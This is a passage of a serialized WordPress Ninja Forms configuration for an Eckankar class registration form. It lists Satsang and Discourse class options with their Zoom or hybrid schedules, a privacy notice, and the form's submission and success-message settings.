Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:5;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:7;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:84:\"Soul Travel 2 - STARTS IN NOVEMBER -- 3rd Saturday at 4:00-5:30 pm - Florence-Hybrid\";s:5:\"value\";s:82:\"Soul Travel 2 - STARTS IN NOVEMBER -- 3rd Saturday at 400-530 pm - Florence-Hybrid\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:6;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:9;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:73:\"The Secret Way - STARTS IN NOVEMBER -- 2nd Tuesday at 7:00-8:30 pm - Zoom\";s:5:\"value\";s:71:\"The Secret Way - STARTS IN NOVEMBER -- 2nd Tuesday at 700-830 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:7;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:10;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:87:\"The Precepts of Eckankar - STARTS IN NOVEMBER -- 3rd Sunday at 9:00 – 10:15 am - Zoom\";s:5:\"value\";s:82:\"The Precepts of Eckankar - STARTS IN NOVEMBER -- 3rd Sunday at 900  1015 am - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:8;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:11;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:106:\"The ECK Satsang Discourses – First Series - STARTS IN NOVEMBER -- 1st Sunday at 12:00 – 1:30 pm - Zoom\";s:5:\"value\";s:98:\"The ECK Satsang Discourses  First Series - STARTS IN NOVEMBER -- 1st Sunday at 1200  130 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:9;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:12;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:109:\"The ECK Satsang Discourses – First Series - STARTS IN NOVEMBER -- 1st Sunday at 11:45 am – 1:00 pm - Zoom\";s:5:\"value\";s:101:\"The ECK Satsang Discourses  First Series - STARTS IN NOVEMBER -- 1st Sunday at 1145 am  100 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:10;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:13;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:98:\"The ECK Satsang Discourses – Second Series - STARTS IN NOVEMBER -- 1st Tuesday at 7:00 pm - Zoom\";s:5:\"value\";s:94:\"The ECK Satsang Discourses  Second Series - STARTS IN NOVEMBER -- 1st Tuesday at 700 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:11;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:14;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:100:\"The ECK Satsang Discourses – Second Series - STARTS IN NOVEMBER -- 2nd Wednesday at 7:00 pm - Zoom\";s:5:\"value\";s:96:\"The ECK Satsang Discourses  Second Series - STARTS IN NOVEMBER -- 2nd Wednesday at 700 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:12;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:16;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:97:\"The ECK Satsang Discourses – Fourth Series - STARTS IN NOVEMBER -- 1st Monday at 7:00 pm - Zoom\";s:5:\"value\";s:93:\"The ECK Satsang Discourses  Fourth Series - STARTS IN NOVEMBER -- 1st Monday at 700 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:13;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:17;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:76:\"The Master 1 Discourses - STARTS IN DECEMBER -- 2nd Monday at 7:00 pm - Zoom\";s:5:\"value\";s:75:\"The Master 1 Discourses - STARTS IN DECEMBER -- 2nd Monday at 700 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:14;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:18;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:79:\"The Master 2 Discourses - STARTS IN NOVEMBER -- 2nd Wednesday at 7:30 pm - Zoom\";s:5:\"value\";s:78:\"The Master 2 Discourses - STARTS IN NOVEMBER -- 2nd Wednesday at 730 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:15;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:20;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:95:\"The Master 4 Discourses - STARTS IN NOVEMBER -- 2nd Sunday at 8:45 – 10:00 am - Temple-Hybrid\";s:5:\"value\";s:90:\"The Master 4 Discourses - STARTS IN NOVEMBER -- 2nd Sunday at 845  1000 am - Temple-Hybrid\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}}s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:14:\"drawerDisabled\";b:0;s:11:\"field_label\";s:31:\"Select One Class Per Registrant\";s:9:\"field_key\";s:45:\"select_one_class_per_registrant_1658696832524\";}s:2:\"id\";i:656;}i:9;a:2:{s:8:\"settings\";a:27:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:12;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:36:\"Enter Message for Arahata (Optional)\";s:4:\"type\";s:8:\"textarea\";s:3:\"key\";s:48:\"enter_message_for_arahata_optional_1599679737041\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:0:\"\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:10:\"characters\";s:15:\"input_limit_msg\";s:17:\"Character(s) left\";s:10:\"manual_key\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:12:\"textarea_rte\";s:0:\"\";s:18:\"disable_rte_mobile\";s:0:\"\";s:14:\"textarea_media\";s:0:\"\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";s:11:\"field_label\";s:36:\"Enter Message for Arahata (Optional)\";s:9:\"field_key\";s:48:\"enter_message_for_arahata_optional_1599679737041\";}s:2:\"id\";i:649;}i:10;a:2:{s:8:\"settings\";a:13:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:13;s:11:\"idAttribute\";s:2:\"id\";s:13:\"element_class\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:4:\"type\";s:2:\"hr\";s:3:\"key\";s:4:\"hr_2\";s:5:\"label\";s:7:\"Divider\";s:11:\"field_label\";s:7:\"Divider\";s:9:\"field_key\";s:4:\"hr_2\";}s:2:\"id\";i:647;}i:11;a:2:{s:8:\"settings\";a:15:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:14;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:4:\"HTML\";s:3:\"key\";s:4:\"html\";s:4:\"type\";s:4:\"html\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:7:\"default\";s:888:\"<p><i>We take your                                                privacy very seriously                                                and will never share                                                your personal                                                information with anyone.                                                Any personal information                                                provided to us will be                                                used only to respond or                                                to service the request                                                or inquiry made</i></p><p><i><b>** For in-person classes</b> -- Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health. </i><i><br></i></p>\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:4:\"HTML\";s:9:\"field_key\";s:4:\"html\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:648;}i:12;a:2:{s:8:\"settings\";a:14:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:15;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:8:\"Register\";s:3:\"key\";s:8:\"register\";s:4:\"type\";s:6:\"submit\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:16:\"processing_label\";s:10:\"Processing\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:8:\"Register\";s:9:\"field_key\";s:8:\"register\";}s:2:\"id\";i:655;}}s:7:\"actions\";a:4:{i:0;a:2:{s:8:\"settings\";a:32:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2023-02-01 08:31:40\";s:5:\"label\";s:15:\"Success Message\";s:7:\"message\";s:42:\"Your form has been successfully submitted.\";s:5:\"order\";s:1:\"1\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:860:\"<div class=\"boldgrid-section color1-background-color color-1-text-contrast bg-background-color\"><div class=\"container\"><div class=\"row\" style=\"padding-top: 100px; padding-bottom: 100px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><p class=\"\" style=\"text-align: center; color: #23507d; font-size: 41px; font-family: Open Sans; font-weight: 600;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Thank You For Registering!</p><p class=\"\" style=\"text-align: center; font-size: 28px; font-family: Open Sans; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">We appreciate you taking the time to complete your Satsang 